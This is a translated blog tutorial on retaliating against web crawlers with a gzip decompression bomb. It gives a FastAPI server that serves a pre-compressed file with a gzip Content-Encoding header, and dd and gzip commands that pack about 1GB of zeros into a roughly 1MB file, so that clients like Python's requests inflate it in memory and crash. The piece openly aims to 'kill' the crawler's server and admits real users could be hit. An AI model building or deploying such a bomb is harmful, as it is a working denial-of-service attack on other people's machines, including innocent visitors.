One skill a day: the ultimate anti-crawler method, a few lines of code directly blow up the crawler server

As a webmaster, are you bothered by crawlers? Crawler crawls every day, the speed is fast, the frequency is high, and a lot of server resources are wasted.

Blessed are you who read this article, let's take revenge on the crawler today, and directly kill the crawler's server.

This article has a premise: you already know that a request is sent by a crawler, and you are not satisfied with just blocking the other party, but want to kill the other party.

Many people's crawlers are written using Requests. If you have read the documentation of Requests, you may have seen this sentence in the Binary Response Content[1] section of the document:

The gzip and deflate transfer-encodings are automatically decoded for you. (Request) will automatically decode the data transcoded by gzip and deflate for you

The web server may use gzip to compress some large resources, which are in compressed binary format when transmitted over the network. After the client receives the return, if it finds that there is a field called Content-Encoding in the returned Headers , the value of which contains gzip , then the client will first use gzip to decompress the data, and then present it to the client after the decompression is complete. above. The browser will do this automatically, and the user is unaware of this happening. And requests , Scrapy and other network request libraries or crawler frameworks will also do this for you, so you don't need to manually decompress the data returned by the website.

This feature was originally a developer-friendly feature, but we can use this feature to retaliate against the crawler.

Let's first write a client to test the method that returns gzipped data.

I first create a text file text.txt on the hard disk with two lines in it, as shown in the image below:

insert image description here
Then, I compress it into a .gz file using the gzip command:

cat text.txt | gzip > data.gz

Next, we write an HTTP server server.py using FastAPI :

from fastapi import FastAPI, Response
from fastapi.responses import FileResponse


app = FastAPI()


@app.get('/')
def index():
    resp = FileResponse('data.gz')
    return resp

Then start the service with the command uvicorn server:app .

Next, we use requests to request this interface, and we will find that the returned data is garbled, as shown in the following figure:

insert image description here
The returned data is garbled because the server did not tell the client that the data is gzip compressed, so the client only displays it as it is. Since the compressed data is binary content, it will become garbled if it is forcibly converted into a string.

Now, let's slightly modify the code of server.py to tell the client through Headers that this data is gzipped :

from fastapi import FastAPI, Response
from fastapi.responses import FileResponse


app = FastAPI()


@app.get('/')
def index():
    resp = FileResponse('data.gz')
    resp.headers['Content-Encoding'] = 'gzip'  # 说明这是gzip压缩的数据
    return resp

After the modification, restart the server, use the requests request again, and find that the data can be displayed normally:

insert image description here
This feature has been shown, so how do we use it? This has to mention the principle of compressed files.

Files can be compressed because there are a lot of repeated elements in them that can be represented in a simpler way. There are many kinds of compression algorithms, one of the most common, we use an example to explain. Suppose there is a string that looks like this:

1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111
1111111111111111

We can represent it with 5 characters: 192 1s . This is equivalent to compressing 192 characters into 5 characters, and the compression rate is as high as 97.4%.

If we can compress a 1GB file into 1MB, then for the server, only 1MB of binary data is returned, which will not cause any impact. But for the client or crawler, after it gets this 1MB of data, it will restore it to 1GB of content in memory. In this instant, the memory occupied by the crawler increases by 1GB. If we further increase this original data, it is easy to fill the server memory where the crawler is located. The light server directly kills the crawler process, and the crawler server directly crashes.

Don't think this compression ratio sounds exaggerated, in fact, we can generate such compressed files with a very simple one-line command.

If you are using Linux, then execute the command:

dd if=/dev/zero bs=1M count=1000 | gzip > boom.gz

If your computer is macOS, then execute the command:

dd if=/dev/zero bs=1048576 count=1000 | gzip > boom.gz

The execution process is shown in the following figure:

insert image description here
The resulting boom.gz file is only 995KB. But if we decompress this file with gzip -d boom.gz , we will find that a 1GB boom file is generated, as shown in the following figure:

insert image description here
As long as you change the count=1000 in the command to a larger number, you can get a larger file.

I am now changing the count to 10 to give you a demo (I dare not test with 1GB of data, I am afraid that my Jupyter will crash). The resulting boom.gz file is only 10KB:

insert image description here
The server returns a 10KB binary data without any problems.

Now we use requests to request this interface, and then check the memory size occupied by the resp object:

insert image description here
It can be seen that since requests will automatically decompress the returned data, the resulting resp object is as large as 10MB.

If you want to use this method, you must first make sure that the request is sent by a crawler, and then use it. Otherwise, it is not the crawlers but the real users who are killed by you, and it will be troublesome.

Recommended reading

My cousin said that this Python scheduled task can earn 5,000 yuan. Do you believe me?

Guess you like

Origin http://10.200.1.11:23101/article/api/json?id=326868274&siteId=291194637